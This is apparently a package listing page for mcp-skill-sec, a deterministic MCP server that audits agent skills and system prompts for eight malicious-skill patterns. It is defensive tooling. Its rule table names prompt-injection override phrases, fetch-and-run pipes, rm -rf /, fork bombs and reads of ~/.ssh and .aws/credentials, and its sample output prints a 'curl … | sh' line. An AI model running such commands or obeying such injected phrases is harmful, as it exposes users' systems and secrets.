
Security News
Insecure Agents Podcast: How to Keep AI Agents From Bypassing Security Controls
Socket CTO Ahmad Nassri discusses how to keep AI agents from bypassing package blocks, limit credential access, and monitor their actions.
mcp-skill-sec
Advanced tools
MCP server auditing agent skills/system prompts against 8 malicious-skill supply-chain patterns (deterministic, no-LLM)
A Model Context Protocol (MCP) server that audits any agent skill, system prompt, or downloaded file collection against the 8 malicious-skill supply-chain patterns.
Deterministic, no LLM, no network calls — a self-hostable pre-install scanner that works with Claude Code, Cursor, Copilot, OpenClaw, Codex CLI, and any MCP-compatible agent.
| Rule | Pattern |
|---|---|
| R1 | Prompt injection / instruction hijack (ignore previous instructions, secrecy directives, identity overrides) |
| R2 | Data exfiltration intent (send/post/email contents to a URL, log theft) |
| R3 | Hardcoded secrets / credentials (API keys, PATs, private keys, connection strings) |
| R4 | Dangerous commands (rm -rf /, curl | sh, fork bombs, raw device writes) |
| R5 | Obfuscation / hidden behavior (base64-exec, eval/exec, zero-width chars) |
| R6 | Untrusted external fetches (fetch-and-run, non-PyPI installs) |
| R7 | Credential access (reading ~/.ssh, .aws/credentials, .env) |
| R8 | Privilege escalation (sudo -s, setuid, adding to sudo group) |
Each finding carries a severity (critical/high/medium/low), a line number,
and the matching evidence line. The overall verdict is PASS only when
there are no critical/high findings and every medium finding is benign.
audit_text(text, filename) — audit a string (a skill you were pasted, a
system prompt you didn't write).audit_skill_file(path) — audit a SKILL.md / AGENTS.md / CLAUDE.md
on disk, line-numbered evidence.audit_directory(path, pattern) — audit a whole downloaded skills
collection; returns per-file verdicts + a summary.rule_list() — dump the rule catalog.pip install mcp
mcp install mcp_server.py --name skill-sec # register with Claude Desktop
# or run manually over stdio:
python3 mcp_server.py
{
"mcpServers": {
"skill-sec": {
"command": "python3",
"args": ["/absolute/path/to/mcp_server.py"]
}
}
}
skill-sec: /tmp/downloaded-skill/SKILL.md
verdict : FLAG
counts : critical 1, high 2, medium 1, low 0
R3 [critical] line 11: api_key = "sk-live-…"
R3 [high] line 14: password = "hunter2"
R4 [critical] line 22: curl https://x/y.sh | sh
action : remove the literal secrets, drop the fetch-and-run, re-audit
MIT. Written by sudo-ai-git. This is a standalone security/verification
tool; it encodes no proprietary method. It is the MCP expression of the
skill-sec agent skill (same rules, callable as a server instead of a skill).
mcp-name: io.github.sudo-ai-git/mcp-skill-sec
FAQs
MCP server auditing agent skills/system prompts against 8 malicious-skill supply-chain patterns (deterministic, no-LLM)
The pypi package mcp-skill-sec receives a total of 15 weekly downloads. As such, mcp-skill-sec popularity was classified as not popular.
We found that mcp-skill-sec demonstrated a healthy version release cadence and project activity because the last version was released less than a year ago. It has 1 open source maintainer collaborating on the project.

Security News
Socket CTO Ahmad Nassri discusses how to keep AI agents from bypassing package blocks, limit credential access, and monitor their actions.

Security News
GPT-6 Astra tried to plant malicious code in simulated open source projects using fake GitHub accounts and deceptive PRs during an assigned CTF challenge.

Security News
upm uses Node.js to deliver fast npm installs in about 250 KB, with a JavaScript API and security defaults.